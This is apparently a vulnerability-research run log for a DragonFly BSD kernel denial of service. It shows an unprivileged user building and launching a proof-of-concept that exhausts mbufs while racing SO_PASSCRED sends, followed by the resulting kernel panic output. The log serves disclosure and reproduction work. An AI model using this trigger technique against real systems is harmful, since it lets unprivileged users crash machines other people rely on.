DF-0011 / run.log
DF-0011 — decisive run record (nopasscred_panic). Run as unprivileged user maxx (uid 1001).
Guest: DragonFly 6.5-DEVELOPMENT (v6.5.0.1712.g89e6a-DEVELOPMENT, built Mon Jun 29 14:18:01 UTC 2026).

NOTE: this PoC panics the guest, so the program's own stderr (trigger.out on the guest filesystem) is lost when the kernel drops to DDB and the snapshot is reverted. The proof of the panic is the serial-console excerpt in panic.txt (dfbsd-qemu/boot.log), reproduced here. The run was reproduced twice from independent fresh `vm.sh reset` boots with an identical signature.

===== build (fresh guest, DF-0011/build.log) =====
$ cd poc/DF-0011 && cc -o nopasscred_panic nopasscred_panic.c -lpthread
BUILD_EXIT=0
-rwxr-xr-x 1 maxx maxx 10384 Jul 2 00:38 nopasscred_panic

===== launch (unprivileged, detached) =====
$ (./nopasscred_panic > trigger.out 2>&1 &) ; echo launched
launched

(program ramps plain-mbuf pressure via SCM_CREDS-bearing SOCK_DGRAM datagrams held open across many socketpairs, while a trigger thread continuously fires no-control SO_PASSCRED sends; ~44s after launch the guest becomes unresponsive to ssh.)

===== serial console (dfbsd-qemu/boot.log) — the panic =====
login: Warning: objcache(mbuf) exhausted on cpu0!
Warning: objcache(mbuf) exhausted on cpu1!
Fatal user address access from kernel mode from nopasscred_panic at ffffffff806cdac1
Fatal trap 12: page fault while in kernel mode
cpuid = 1; lapic id = 1
fault virtual address = 0x10
fault code = supervisor read data, page not present
instruction pointer = 0x8:0xffffffff806cdac1
stack pointer = 0x10:0xfffff800ab5d3568
frame pointer = 0x10:0xfffff800ab5d35a8
code segment = base 0x0, limit 0xfffff, type 0x1b
= DPL 0, pres 1, long 0, def32 0, gran 1
processor eflags = interrupt enabled, resume, IOPL = 0
current process = 1468
current thread = pri 6
kernel: type 12 trap, code=0
CPU1 stopping CPUs: 0x00000001
stopped
Stopped at unp_internalize.isra.12+0x11: movq 0x10(%rdi),%rbx
db>

===== result =====
status = reproduced (panic). Impact = denial of service. Guest reset afterwards to recover.